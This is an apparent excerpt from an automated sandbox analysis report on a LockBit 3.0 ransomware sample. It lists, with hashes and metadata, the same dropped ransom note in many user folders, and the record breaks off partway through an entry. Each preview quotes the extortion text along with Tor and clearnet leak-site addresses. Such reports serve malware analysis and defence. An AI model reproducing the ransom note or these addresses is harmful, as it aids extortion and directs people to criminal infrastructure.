                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal 